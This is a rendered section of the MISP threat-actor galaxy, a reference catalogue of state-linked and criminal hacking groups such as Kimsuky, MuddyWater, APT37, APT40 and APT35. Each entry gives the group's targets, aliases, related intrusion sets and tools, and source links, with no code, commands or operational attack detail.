https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182276.pdf

TEMP.Hermit

The tag is: misp-galaxy:threat-actor="TEMP.Hermit"

Table 11883. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html

EvilPost

The tag is: misp-galaxy:threat-actor="EvilPost"

Table 11886. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

TEST PANDA

The tag is: misp-galaxy:threat-actor="TEST PANDA"

Table 11887. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Madi

Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.

The tag is: misp-galaxy:threat-actor="Madi"

Table 11888. Table References

Links

https://securelist.com/the-madi-campaign-part-i-5/33693/

https://securelist.com/the-madi-campaign-part-ii-53/33701/

https://www.cfr.org/interactive/cyber-operations/madi

https://www.kaspersky.com/about/press-releases/2012_kaspersky-lab-and-seculert-announce—​madi—​a-newly-discovered-cyber-espionage-campaign-in-the-middle-east

https://threatpost.com/new-and-improved-madi-spyware-campaign-continues-072512/76849/

https://web.archive.org/web/20120718173322/https://www.symantec.com/connect/blogs/madi-attacks-series-social-engineering-campaigns

ELECTRIC PANDA

The tag is: misp-galaxy:threat-actor="ELECTRIC PANDA"

Table 11889. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Kimsuky

This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes.

The tag is: misp-galaxy:threat-actor="Kimsuky"

Kimsuky is also known as:

  • Velvet Chollima

  • Black Banshee

  • Thallium

  • Operation Stolen Pencil

  • G0086

  • APT43

  • Emerald Sleet

  • THALLIUM

Kimsuky has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Emerald Sleet" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUASARRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="RDP Wrapper" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:banker="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="TightVNC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="Chrome Remote Desktop" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="BabyShark" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="BabyShark" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="RevClient" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 11891. Table References

Links

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

https://www.cfr.org/interactive/cyber-operations/kimsuky

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

https://youtu.be/hAsKp43AZmM?t=1027

https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1

https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://attack.mitre.org/groups/G0086/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

https://asec.ahnlab.com/en/57873/

https://asec.ahnlab.com/en/61082/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-29/

https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/

Snake Wine

While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.

The tag is: misp-galaxy:threat-actor="Snake Wine"

Table 11892. Table References

Links

https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html

https://threatvector.cylance.com/en_us/home/the-deception-project-a-new-japanese-centric-threat.html

https://www.jpcert.or.jp/magazine/acreport-ChChes.html

Careto

This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or “Mask”) which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date.What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32-and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).

The tag is: misp-galaxy:threat-actor="Careto"

Careto is also known as:

  • The Mask

  • Mask

  • Ugly Face

Table 11893. Table References

Links

https://securelist.com/the-caretomask-apt-frequently-asked-questions/58254/

https://www.cfr.org/interactive/cyber-operations/careto

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133638/unveilingthemask_v1.0.pdf

GIBBERISH PANDA

The tag is: misp-galaxy:threat-actor="GIBBERISH PANDA"

Table 11894. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

OnionDog

This threat actor targets the South Korean government, transportation, and energy sectors.

The tag is: misp-galaxy:threat-actor="OnionDog"

Table 11895. Table References

Links

http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml

https://www.cfr.org/interactive/cyber-operations/onion-dog

Clever Kitten

The tag is: misp-galaxy:threat-actor="Clever Kitten"

Clever Kitten is also known as:

  • Group 41

Clever Kitten has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

Table 11896. Table References

Links

http://www.crowdstrike.com/blog/whois-clever-kitten/

Cyber Caliphate Army

The tag is: misp-galaxy:threat-actor="Cyber Caliphate Army"

Cyber Caliphate Army is also known as:

  • Islamic State Hacking Division

  • CCA

  • United Cyber Caliphate

  • UUC

  • CyberCaliphate

Table 11898. Table References

Links

https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division

https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&bind_to_category=content:37&tagId=697

MAGNETIC SPIDER

The tag is: misp-galaxy:threat-actor="MAGNETIC SPIDER"

Table 11899. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Cyber fighters of Izz Ad-Din Al Qassam

The tag is: misp-galaxy:threat-actor="Cyber fighters of Izz Ad-Din Al Qassam"

Cyber fighters of Izz Ad-Din Al Qassam is also known as:

  • Fraternal Jackal

Table 11901. Table References

Links

http://pastebin.com/u/QassamCyberFighters

http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html

APT6

The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,”Deepen said.

The tag is: misp-galaxy:threat-actor="APT6"

APT6 is also known as:

  • 1.php Group

Table 11902. Table References

Links

https://threatpost.com/fbi-quietly-admits-to-multi-year-apt-attack-sensitive-data-stolen/117267/

White Bear

As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.

The tag is: misp-galaxy:threat-actor="White Bear"

White Bear is also known as:

  • Skipper Turla

Table 11906. Table References

Links

https://securelist.com/introducing-whitebear/81638/

https://www.cfr.org/interactive/cyber-operations/whitebear

PALE PANDA

The tag is: misp-galaxy:threat-actor="PALE PANDA"

Table 11907. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Mana Team

The tag is: misp-galaxy:threat-actor="Mana Team"

Table 11908. Table References

Links

http://webcache.googleusercontent.com/search?q=cache:TWoHHzH9gU0J:en.hackdig.com/02/39538.htm

Sowbug

Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.

The tag is: misp-galaxy:threat-actor="Sowbug"

Sowbug is also known as:

  • G0054

Sowbug has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Sowbug - G0054" with estimative-language:likelihood-probability="likely"

Table 11909. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

https://www.cfr.org/interactive/cyber-operations/sowbug

https://attack.mitre.org/groups/G0054/

MuddyWater

The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

The tag is: misp-galaxy:threat-actor="MuddyWater"

MuddyWater is also known as:

  • TEMP.Zagros

  • Static Kitten

  • Seedworm

  • MERCURY

  • COBALT ULSTER

  • G0069

  • ATK51

  • Boggy Serpens

  • Mango Sandstorm

  • TA450

MuddyWater has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mango Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11910. Table References

Links

https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.cfr.org/interactive/cyber-operations/muddywater

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/

https://securelist.com/muddywater/88059/

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/

https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html

https://www.zdnet.com/article/new-leaks-of-iranian-cyber-espionage-operations-hit-telegram-and-the-dark-web/

https://attack.mitre.org/groups/G0069/

http://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://unit42.paloaltonetworks.com/atoms/boggyserpens/

https://www.sentinelone.com/blog/the-new-frontline-of-geopolitics-understanding-the-rise-of-state-sponsored-cyber-attacks/

MoneyTaker

In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.

The tag is: misp-galaxy:threat-actor="MoneyTaker"

Table 11911. Table References

Links

https://www.bleepingcomputer.com/news/security/moneytaker-hacker-group-steals-millions-from-us-and-russian-banks/

https://www.group-ib.com/blog/moneytaker

Dark Caracal

Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.

The tag is: misp-galaxy:threat-actor="Dark Caracal"

Dark Caracal is also known as:

  • G0070

Table 11912. Table References

Links

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

https://research.checkpoint.com/2020/bandook-signed-delivered

https://attack.mitre.org/groups/G0070/

Nexus Zeta

Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.

The tag is: misp-galaxy:threat-actor="Nexus Zeta"

Table 11913. Table References

Links

https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7

APT37

APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities

The tag is: misp-galaxy:threat-actor="APT37"

APT37 is also known as:

  • APT 37

  • Group 123

  • Group123

  • InkySquid

  • Operation Daybreak

  • Operation Erebus

  • Reaper Group

  • Reaper

  • Red Eyes

  • Ricochet Chollima

  • ScarCruft

  • Venus 121

  • ATK4

  • G0067

  • Moldy Pisces

APT37 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT37 - G0067" with estimative-language:likelihood-probability="likely"

  • linked-to: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28" with estimative-language:likelihood-probability="likely"

Table 11914. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://twitter.com/mstoned7/status/966126706107953152

https://www.cfr.org/interactive/cyber-operations/apt-37

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

https://unit42.paloaltonetworks.com/unit42-freemilk-highly-targeted-spear-phishing-campaign/

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://attack.mitre.org/groups/G0067/

https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/

https://securelist.com/operation-daybreak/75100/

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/

https://unit42.paloaltonetworks.com/atoms/moldypisces/

APT40

Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

The tag is: misp-galaxy:threat-actor="APT40"

APT40 is also known as:

  • TEMP.Periscope

  • TEMP.Jumper

  • Leviathan

  • BRONZE MOHAWK

  • GADOLINIUM

  • KRYPTONITE PANDA

  • G0065

  • ATK29

  • TA423

  • Red Ladon

  • ITG09

  • MUDCARP

  • ISLANDDREAMS

  • Gingham Typhoon

APT40 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Leviathan - G0065" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="GADOLINIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Gingham Typhoon" with estimative-language:likelihood-probability="likely"

Table 11915. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.cfr.org/interactive/cyber-operations/apt-40

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/

https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html

https://attack.mitre.org/groups/G0065/

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company

https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu

https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network

https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding

https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.mycert.org.my/portal/advisory?id=MA-774.022020

https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion

https://www.justice.gov/opa/press-release/file/1412916/download

https://www.justice.gov/opa/press-release/file/1412921/download

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://us-cert.cisa.gov/ncas/alerts/aa21-200b

https://www.canada.ca/en/global-affairs/news/2021/07/statement-on-chinas-cyber-campaigns.html

https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://www.mofa.go.jp/press/danwa/press6e_000312.html

https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory

https://www.mandiant.com/resources/insights/apt-groups

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia

https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea

https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf

https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/

APT35

FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and the Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.

The tag is: misp-galaxy:threat-actor="APT35"

APT35 is also known as:

  • Newscaster Team

  • Magic Hound

  • G0059

  • Phosphorus

  • Mint Sandstorm

  • TunnelVision

  • COBALT MIRAGE

APT35 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mint Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11916. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://attack.mitre.org/groups/G0059/

https://www.cfr.org/interactive/cyber-operations/magic-hound

https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html

https://www.cfr.org/cyber-operations/apt-35

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/

https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us

Orangeworm

Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations that operate within the healthcare sector in the United States, Europe, and Asia. First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims. Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage.

The tag is: misp-galaxy:threat-actor="Orangeworm"

Table 11917. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

https://attack.mitre.org/groups/G0071/

ALLANITE

Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.

The tag is: misp-galaxy:threat-actor="ALLANITE"

ALLANITE is also known as:

  • Palmetto Fusion

  • Allanite

ALLANITE has relationships with:

  • similar: misp-galaxy:mitre-ics-groups="ALLANITE" with estimative-language:likelihood-probability="almost-certain"

Table 11918. Table References

Links

https://dragos.com/adversaries.html

https://dragos.com/blog/20180510Allanite.html

CHRYSENE

Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”

The tag is: misp-galaxy:threat-actor="CHRYSENE"

CHRYSENE is also known as:

  • OilRig

  • Greenbug

CHRYSENE has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Greenbug" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11919. Table References

Links

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/chrysene

ZooPark

ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.

The tag is: misp-galaxy:threat-actor="ZooPark"

Table 11920. Table References

Links

https://securelist.com/whos-who-in-the-zoo/85394/

RANCOR

The Rancor group’s attacks use two primary malware families which are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to Singapore and Cambodia.

The tag is: misp-galaxy:threat-actor="RANCOR"

RANCOR is also known as:

  • Rancor group

  • Rancor

  • Rancor Group

  • G0075

  • Rancor Taurus

Table 11921. Table References

Links

https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

https://www.cfr.org/interactive/cyber-operations/rancor

https://attack.mitre.org/groups/G0075/

https://unit42.paloaltonetworks.com/atoms/rancortaurus/

The Big Bang

While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.

The tag is: misp-galaxy:threat-actor="The Big Bang"

Table 11922. Table References

Links

https://research.checkpoint.com/apt-attack-middle-east-big-bang/

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

The Gorgon Group

Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.

The tag is: misp-galaxy:threat-actor="The Gorgon Group"

The Gorgon Group is also known as:

  • Gorgon Group

  • Subaat

  • ATK92

  • G0078

  • Pasty Gemini

Table 11923. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

